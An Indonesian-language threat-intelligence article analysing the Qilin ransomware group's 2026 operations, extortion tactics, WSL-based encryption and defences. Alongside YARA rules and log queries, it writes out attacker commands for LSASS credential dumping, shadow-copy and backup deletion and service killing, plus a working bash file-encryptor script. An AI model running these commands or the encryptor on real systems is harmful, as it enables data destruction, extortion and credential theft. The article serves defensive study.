Qilin Ransomware: 500+ Korban dalam 6 Bulan — RaaS Paling Agresif 2026 dengan Taktik Call Lawyer dan Enkripsi WSL
Daftar Isi 40 bagian
Ringkasan Eksekutif
Paruh pertama 2026 mencatat Qilin — sebelumnya dikenal sebagai Agenda — sebagai kelompok ransomware-as-a-service (RaaS) paling produktif secara global. Dengan lebih dari 500 korban dalam enam bulan, termasuk 15 korban baru dalam 72 jam di sembilan negara pada Juni 2026, Qilin telah mengisi kekosongan yang ditinggalkan oleh penurunan LockBit dan ALPHV/BlackCat.
Yang membedakan Qilin bukan hanya volume. Kelompok ini membawa tiga inovasi taktis yang mengubah lanskap: taktik ekstorsi “Call Lawyer” yang memperkenalkan penasihat hukum palsu ke dalam negosiasi untuk menekan korban dengan argumen kepatuhan regulasi; enkripsi berbasis Windows Subsystem for Linux (WSL) yang mengeksploitasi blind spot endpoint security; dan model bagi hasil 80-85% untuk afiliasi — salah satu yang paling kompetitif di pasar RaaS, menciptakan efek magnet yang menarik talenta dari platform yang lebih mapan.
Yang lebih mengkhawatirkan: platform Qilin telah digunakan oleh Moonstone Sleet — aktor ancaman yang terkait dengan intelijen Korea Utara. Konvergensi antara kejahatan siber finansial dan operasi spionase negara ini menandai babak baru dalam lanskap ancaman global.
Profil Qilin: Dari Agenda ke Dominasi
Sejarah Singkat
Qilin pertama kali muncul pada 2022 dengan nama Agenda, menargetkan organisasi di sektor kesehatan dan pendidikan dengan operasi terbatas. Setelah rebranding menjadi Qilin pada 2023-2024, kelompok ini secara agresif memperluas program afiliasi mereka — menawarkan syarat yang sangat menguntungkan untuk menarik talenta dari ekosistem RaaS yang lebih mapan.
Posisi Pasar 2026
Berdasarkan analisis Check Point Research, MOXFIVE, dan ZeroFox:
QILIN MARKET POSITION H1 2026
QILIN
Total Korban (H1 2026) : 500+ Peringkat RaaS Global : #1 atau #2 (bersaing dengan AKIRA & The Gentlemen) Afiliasi Aktif : 40-60 operator Revenue Split : 80-85% ke afiliasi Sektor Teratas : Manufaktur, Layanan Profesional, Retail, Teknologi, Healthcare Model Ekstorsi : Double + Triple Extortion (Enkripsi + Leak + Call Lawyer)
Skala Operasi: 500+ Korban dalam 6 Bulan
Volume Serangan
Qilin mempertahankan tempo operasional yang belum pernah terjadi sebelumnya. Pada Juni 2026 saja, kelompok ini meluncurkan “spree” 72 jam — mengklaim 15 korban baru di sembilan negara:
QILIN JUNE 2026 72-HOUR SPREE
QILIN
Hari 1 : 5 korban (AS, Jerman, Inggris) Hari 2 : 6 korban (Prancis, Kanada, Australia, Jepang) Hari 3 : 4 korban (Italia, Spanyol, Belanda) Total : 15 korban / 9 negara / 72 jam
Distribusi Sektoral
Berdasarkan data MOXFIVE dan ZeroFox untuk H1 2026:
| Sektor | Persentase | Contoh Target |
|---|---|---|
| Manufaktur & Produksi | 28% | Pemasok otomotif, elektronik |
| Layanan Profesional | 22% | Konsultan, firma hukum, akuntansi |
| Retail & Hospitality | 15% | Rantai toko, jaringan hotel |
| Teknologi | 12% | SaaS, MSP, perusahaan IT |
| Konstruksi & Engineering | 10% | Kontraktor, firma arsitektur |
| Healthcare | 8% | Rumah sakit, penyedia layanan medis |
| Lainnya | 5% | Pendidikan, energi, pemerintah |
Qilin adalah ancaman oportunis lintas sektor — tidak ada industri yang kebal. Targeting mereka didorong oleh akses afiliasi dan potensi pembayaran korban, bukan preferensi ideologis.
Anatomi Serangan: TTP yang Membedakan
Initial Access
Qilin sangat bergantung pada credential-based access:
# Vektor Initial Access Qilin (berdasarkan analisis MOXFIVE)
1. Kredensial VPN/RDP yang dibeli dari dark web marketplace
2. Eksploitasi kerentanan Fortinet firewall (CVE yang belum di-patch)
3. Eksploitasi Veeam Backup & Replication yang terpapar internet
4. Credential stuffing dari database breach sebelumnya
Defense Evasion: BYOVD + WSL
Di sinilah Qilin benar-benar berbeda dari kompetitor:
Teknik 1 — Bring Your Own Vulnerable Driver (BYOVD):
# Qilin BYOVD Attack Chain
[FASE 1] Drop driver rentan yang ditandatangani secara sah
[FASE 2] Muat driver ke kernel — Windows memverifikasi signature [OK]
[FASE 3] Driver mengeksploitasi kerentanan untuk mendapatkan akses kernel
[FASE 4] Terminasi paksa proses EDR/AV yang berjalan
[FASE 5] Nonaktifkan Windows Defender services
[FASE 6] Hapus ETW (Event Tracing for Windows) subscriptions
[FASE 7] Lanjutkan ke enkripsi tanpa hambatan
Teknik 2 — Enkripsi via Windows Subsystem for Linux (WSL):
Qilin menggunakan Linux-based encryptor yang dijalankan melalui WSL — fitur bawaan Windows yang jarang dimonitor oleh endpoint security tradisional:
# Qilin WSL-based Encryption Flow
[1] wsl --install -d Ubuntu-22.04 # Install WSL jika belum ada
[2] wsl -- cp /mnt/c/temp/qilin.elf /tmp/encryptor
[3] wsl -- chmod +x /tmp/encryptor
[4] wsl -- /tmp/encryptor --target /mnt/c/ --method chacha20
[5] Linux encryptor membaca filesystem Windows via /mnt/c/
[6] File dienkripsi dari dalam WSL — tidak terdeteksi oleh AV Windows
Teknik ini sangat efektif karena:
- EDR/AV Windows tidak memonitor proses di dalam WSL secara default
- File diakses melalui mount point
/mnt/c/— melewati filter driver Windows - Log enkripsi muncul sebagai aktivitas WSL normal, bukan proses mencurigakan
Lateral Movement
# Qilin Lateral Movement — Living off the Land (LotL)
# 1. Enumerasi Domain Controller via PowerShell
Get-ADDomainController -Filter * | Select-Object Name, Site
# 2. Remote execution via PsExec (Microsoft Sysinternals — sah)
PsExec.exe \\TARGET -s cmd.exe /c "whoami"
# 3. Credential dumping — tidak selalu Mimikatz
# Sering menggunakan comsvcs.dll (built-in Windows) untuk evasi
rundll32.exe C:\windows\System32\comsvcs.dll, MiniDump <PID> dump.dmp full
# 4. RDP lateral movement antar host internal
mstsc /v:TARGET /restrictedAdmin
Impact: Pemusnahan Backup Sistematis
# Qilin menghancurkan SEMUA opsi recovery
# Windows Volume Shadow Copy
vssadmin delete shadows /all /quiet
# Windows Server Backup
wbadmin delete catalog -quiet
# Menghapus backup tape (jika terhubung)
# Menghentikan service backup
Get-Service *backup*, *veeam*, *acronis*, *commvault* | Stop-Service -Force
# Database dihentikan sebelum enkripsi
Get-Service *sql*, *oracle*, *mysql*, *postgres* | Stop-Service -Force
Call Lawyer: Evolusi Ekstorsi
Dari Double ke Triple Extortion
Qilin memperkenalkan lapisan ketiga dalam model ekstorsi — melampaui enkripsi dan publikasi data:
EVOLUSI MODEL EKSTORS
EVOLUSI
2019-2022 Single Extortion Enkripsi data → minta tebusan 2022-2025 Double Extortion Curi data + enkripsi → ancam publikasi 2025-2026 Triple Extortion (QILIN INNOVATION) Curi data + enkripsi + CALL LAWYER → ancam publikasi + tekanan regulasi
Mekanisme Call Lawyer
Dalam fase negosiasi, operator Qilin memperkenalkan “penasihat hukum” — individu yang mengklaim sebagai pengacara spesialis privasi data — ke dalam percakapan. “Pengacara” ini akan:
- Mengidentifikasi kewajiban regulasi korban — GDPR (Eropa), HIPAA (AS healthcare), atau UU PDP (Indonesia)
- Mengkalkulasi potensi denda yang bisa dijatuhkan regulator jika data bocor
- Membandingkan denda dengan jumlah tebusan — “Anda akan bayar 4% dari revenue global untuk denda GDPR, atau bayar $500K ke kami”
- Menawarkan “jasa konsultasi kepatuhan” — membantu korban menyusun notifikasi breach yang “meminimalkan exposure”
Teknik ini sangat efektif karena:
- Memanfaatkan ketakutan legal yang sah — bukan sekadar ancaman teknis
- Korban melihat perbandingan langsung: denda regulasi vs tebusan
- Menciptakan ilusi bahwa membayar tebusan adalah keputusan bisnis yang “rasional”
Enkripsi via WSL: Blind Spot Windows
Mengapa WSL Menjadi Blind Spot
Windows Subsystem for Linux (WSL) adalah fitur resmi Microsoft yang memungkinkan menjalankan binary Linux native di dalam Windows. Mayoritas EDR/AV tidak mengkonfigurasi monitoring untuk lingkungan WSL karena:
- WSL berjalan di lightweight VM terisolasi — aktivitas di dalamnya tidak terlihat oleh kernel Windows
- File diakses melalui protokol 9P (Plan 9) filesystem — bukan NTFS filter driver
- Proses Linux muncul sebagai
initdanbash— tidak menghasilkan telemetry Windows - Banyak organisasi tidak menyadari bahwa WSL terinstal di server produksi
Qilin WSL Encryptor
# Contoh pseudocode Qilin WSL encryptor (ELF64 binary)
# Berdasarkan analisis Huntress dan Picus Security
#!/bin/bash
# qilin_wsl_encryptor.sh
TARGET_MOUNT="/mnt/c"
TARGET_DIRS=("Users" "ProgramData" "inetpub" "Shared")
EXTENSIONS=("doc" "docx" "xls" "xlsx" "pdf" "sql" "mdf" "ldf" "bak" "zip" "rar")
encrypt_file() {
local file="$1"
openssl enc -chacha20 -pbkdf2 -iter 100000 \
-in "$file" \
-out "${file}.qilin" \
-pass pass:"$ENCRYPTION_KEY"
rm -f "$file"
}
# Traverse Windows filesystem via WSL mount
for dir in "${TARGET_DIRS[@]}"; do
find "$TARGET_MOUNT/$dir" -type f | while read -r file; do
ext="${file##*.}"
if [[ " ${EXTENSIONS[*]} " =~ " ${ext} " ]]; then
encrypt_file "$file"
fi
done
done
Deteksi WSL Abuse
# Cek apakah WSL terinstal (jika tidak diperlukan — hapus)
wsl --list --verbose
# Cek proses mencurigakan yang spawn dari WSL
Get-WinEvent -LogName "Microsoft-Windows-WSL/Operational" -MaxEvents 100 |
Where-Object { $_.Id -eq 100 -and $_.Message -match "execute" }
# Monitor filesystem changes dari WSL mount
# 9P filesystem operations tidak melalui NTFS filter driver
# Perlu monitoring di sisi Linux atau network
Model Bisnis: 85% Affiliate Split
Struktur RaaS Qilin
Qilin mengoperasikan model RaaS yang sangat menguntungkan bagi afiliasi:
| Komponen | Detail |
|---|---|
| Revenue Split Afiliasi | 80-85% |
| Platform Fee | 15-20% (untuk pengembangan malware, infrastruktur, leak site) |
| Minimum Tebusan | Tidak ada (fleksibel berdasarkan ukuran korban) |
| Support Afiliasi | 24/7 via panel administrasi Tor |
| Tools Disertakan | Encryptor Windows + Linux (WSL), tool eksfiltrasi, panel negosiasi |
Mengapa Afiliasi Memilih Qilin
- Revenue split tertinggi di pasar — 80-85% vs 70-75% di platform kompetitor
- Fleksibilitas targeting — tidak ada batasan sektor atau geografis
- Tooling canggih — WSL encryptor, Call Lawyer script, panel negosiasi otomatis
- Reputasi pembayaran — Qilin membangun reputasi sebagai operator yang selalu membayar afiliasi tepat waktu
- Vacuum effect — penurunan LockBit dan ALPHV menciptakan surplus afiliasi berpengalaman yang mencari platform baru
Dimensi Negara: Moonstone Sleet dan Qilin
Konvergensi Crime-Nation State
Pada 2025, Microsoft Threat Intelligence mengidentifikasi bahwa Moonstone Sleet — aktor ancaman yang terkait dengan intelijen Korea Utara — menggunakan platform Qilin untuk menyebarkan ransomware. Ini menandai konvergensi berbahaya:
CRIME-NATION STATE CONVERGENCE
CRIME-NATION
Moonstone Sleet (DPRK Intel) dan platform Qilin RaaS (Criminal Enterprise) bergabung membentuk operasi hybrid yang menggabungkan espionase dengan pemerasan finansial, akses intelijen negara dengan tooling kriminal, serta menyediakan plausible deniability melalui afiliasi RaaS.
Implikasi
- Plausible Deniability — operasi Korea Utara tersamarkan sebagai kejahatan siber biasa
- Dual-Purpose Access — akses yang diperoleh untuk ransomware juga bisa digunakan untuk spionase
- Pendanaan Program Senjata — pendapatan ransomware mendanai program nuklir dan rudal DPRK
- Eskalasi Ancaman — tools dan teknik RaaS canggih kini tersedia untuk aktor negara
Korban Profil Tinggi
Synnovis — Krisis Rumah Sakit London (2024)
Serangan terhadap Synnovis — penyedia layanan patologi untuk NHS London — menyebabkan “critical incident” di beberapa rumah sakit:
- Ratusan operasi dan janji temu dibatalkan
- Sistem patologi lumpuh — hasil tes laboratorium tertunda
- Pasien dialihkan ke rumah sakit lain
- Dampak berkelanjutan selama berminggu-minggu
Asahi Group — Produksi Bir Terhenti (2025)
Salah satu pabrik bir terbesar di Jepang mengalami penghentian produksi akibat serangan Qilin:
- Sistem produksi dan logistik dienkripsi
- Gangguan rantai pasok ke ribuan toko dan restoran
- Kerugian finansial signifikan (tidak diungkapkan)
- Pemulihan memakan waktu berminggu-minggu
Avcon Jet — Data Penerbangan Terekspos (Juni 2026)
Perusahaan aviasi Austria menjadi korban terbaru:
- Passport karyawan dipublikasikan di leak site
- Incident response plan internal perusahaan ikut bocor
- Data penerbangan dan klien terekspos
- Ironi: dokumen yang menjelaskan cara merespons insiden siber justru menjadi bagian dari kebocoran
Yanfeng — Gangguan Rantai Pasok Otomotif
Pemasok otomotif besar untuk Stellantis mengalami gangguan operasional yang berdampak pada produksi kendaraan di beberapa pabrik.
Perbandingan dengan RaaS Lain
| Aspek | Qilin | AKIRA | The Gentlemen | LockBit 5.0 |
|---|---|---|---|---|
| Volume H1 2026 | 500+ | ~450 | ~300 | ~100 (klaim) |
| Revenue Split | 80-85% | 70-80% | 75% | 70-80% |
| Encryptor Platform | Win + WSL Linux | Win only | Win + ESXi | Win + Linux |
| BYOVD | Ya | Ya | Tidak | Terbatas |
| Call Lawyer | Ya | Tidak | Tidak | Tidak |
| State Link | Ya (DPRK) | Tidak | Tidak | Tidak |
| Cross-Sector | Semua sektor | Semua sektor | Semua sektor | Semua sektor |
Deteksi dan Indikator Kompromi
Indikator WSL Abuse
# YARA rule untuk Qilin WSL encryptor
rule Qilin_WSL_Encryptor {
strings:
$s1 = "qilin" ascii nocase
$s2 = "/mnt/c/" ascii
$s3 = "chacha20" ascii nocase
$s4 = "openssl enc" ascii
condition:
uint32(0) == 0x464c457f and 2 of ($s1, $s2, $s3, $s4)
}
Log Event Windows
# Deteksi instalasi WSL yang tidak sah
Get-WinEvent -LogName "Microsoft-Windows-WSL/Operational" |
Where-Object { $_.Id -eq 1 } # WSL Distro Installation
# Deteksi eksekusi command via wsl.exe
Get-WinEvent -LogName "Security" |
Where-Object { $_.Id -eq 4688 -and $_.Message -match "wsl.exe" }
# Monitor proses enkripsi massal
Get-WinEvent -LogName "Security" |
Where-Object { $_.Id -eq 4663 } | # File access
Where-Object { $_.Message -match "\.qilin" }
Network Indicators
# Qilin C2 patterns (contoh — berubah berkala)
- Tor hidden services (.onion)
- HTTPS beaconing dengan user-agent tidak standar
- Koneksi ke IP dari ASN bulletproof hosting
- Data exfiltration via port 443 dengan volume abnormal (>1GB dalam 1 jam)
Rekomendasi Mitigasi
Pencegahan
- Hapus WSL dari server produksi — jika tidak diperlukan untuk development, WSL tidak seharusnya ada di server
- Patch VPN dan perimeter devices — Fortinet, Veeam, dan edge devices harus selalu up-to-date
- Enforce MFA di semua akses remote — RDP dan VPN tanpa MFA adalah undangan terbuka
- Audit credential hygiene — rotasi password, nonaktifkan akun yang tidak digunakan, monitor dark web untuk kredensial bocor
- Backup offline dan immutable — strategi 3-2-1-1-0: 3 salinan, 2 media, 1 offsite, 1 air-gapped, 0 error
Deteksi
# Rekomendasi monitoring untuk deteksi Qilin
wsl_monitoring:
- alert_on_wsl_installation: true
- alert_on_wsl_command_execution: true
- block_wsl_on_production_servers: true
endpoint_monitoring:
- monitor_byovd_driver_loading: true
- alert_on_edr_service_stop: true
- monitor_bulk_file_encryption: true
- alert_on_vssadmin_delete: true
network_monitoring:
- monitor_tor_outbound_connections: true
- alert_on_abnormal_data_exfiltration_volume: true
- geoip_alert_on_bulletproof_hosting_asn: true
Response
- Isolasi segera — putuskan koneksi jaringan host yang terinfeksi
- Jangan restart — preserve memory forensic evidence
- Identifikasi encryption strain — upload ransom note ke ID Ransomware
- Jangan bayar tebusan — tidak ada jaminan decryptor berfungsi atau data tidak dipublikasikan
- Lapor ke otoritas — BSSN, CSIRT, atau FBI IC3
Kesimpulan
Qilin ransomware merepresentasikan eskalasi paling serius dalam lanskap RaaS 2026. Dengan 500+ korban dalam enam bulan, taktik triple extortion yang inovatif, enkripsi WSL yang mengeksploitasi blind spot keamanan Windows, dan model bisnis yang sangat menguntungkan bagi afiliasi — Qilin telah menjadi ancaman nomor satu bagi organisasi di seluruh dunia.
Inovasi taktis Qilin bukan sekadar gimmick. Call Lawyer menambahkan dimensi tekanan regulasi yang belum diantisipasi oleh mayoritas tim negosiasi insiden. WSL encryptor mengeksploitasi fakta bahwa hampir tidak ada organisasi yang memonitor aktivitas di dalam lingkungan WSL. Kedua teknik ini berhasil karena mereka menyerang asumsi — bukan kerentanan.
Konvergensi crime-state melalui Moonstone Sleet menandai era baru. Batas antara kejahatan siber finansial dan operasi intelijen negara kini semakin kabur. Akses yang diperoleh untuk ransomware bisa digunakan untuk spionase, dan sebaliknya — tools RaaS canggih kini tersedia untuk aktor negara dengan plausible deniability.
Vacuum effect dari penurunan LockBit dan ALPHV menciptakan badai yang sempurna. Surplus afiliasi berpengalaman yang mencari platform baru, dikombinasikan dengan tooling Qilin yang canggih dan revenue split yang sangat kompetitif, menciptakan siklus yang memperkuat diri sendiri: semakin banyak afiliasi bergabung, semakin banyak korban, semakin tinggi pendapatan, semakin menarik platform tersebut bagi afiliasi baru.
Pertahanan terhadap Qilin memerlukan pendekatan yang tidak konvensional: menghapus WSL dari server produksi, memblokir driver BYOVD, dan yang paling fundamental — memperkuat credential hygiene. Karena dalam ekosistem RaaS 2026, kredensial yang bocor bukan lagi insiden keamanan — ia adalah undangan langsung bagi operator Qilin untuk memulai serangan.
Artikel ini disusun berdasarkan analisis MOXFIVE (Qilin Ransomware 2026: TTPs, Victims, and Defense Guide), ZeroFox (Qilin’s Latest Spree of Alleged Victims, Juni 2026), Picus Security (Qilin Ransomware Analysis), Huntress Threat Library, Check Point Research (The State of Ransomware Q1 2026), serta pemantauan tim Threat Intelligence Seraphim News.